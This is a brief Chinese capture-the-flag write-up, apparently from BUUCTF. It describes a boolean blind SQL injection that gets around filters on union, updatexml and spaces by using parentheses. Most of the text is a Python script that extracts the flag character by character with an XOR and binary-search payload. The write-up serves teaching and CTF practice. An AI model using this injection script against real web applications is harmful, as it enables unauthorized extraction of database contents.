fuzz一下过滤参数,发现union、updatexml等被过滤了
测试后发现应该是盲注,不过空格也被过滤了,这里用()来绕过
编写脚本
import requests
import time
url = 'http://9aec0978-fe58-4986-a25e-a860f7604140.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1, 43):
max = 127
min = 0
for c in range(0, 127):
s = int((max + min) / 2)
payload = '1^(ascii(substr((select(flag)from(flag)),' + str(i) + ',1))>' + str(s) + ')'
r = requests.post(url, data={'id': payload})
time.sleep(0.1)
if 'Hello, glzjin wants a girlfriend.' in str(r.content):
max = s
else:
min = s
if (max - min) <= 1:
flag += chr(max)
break
print(flag)
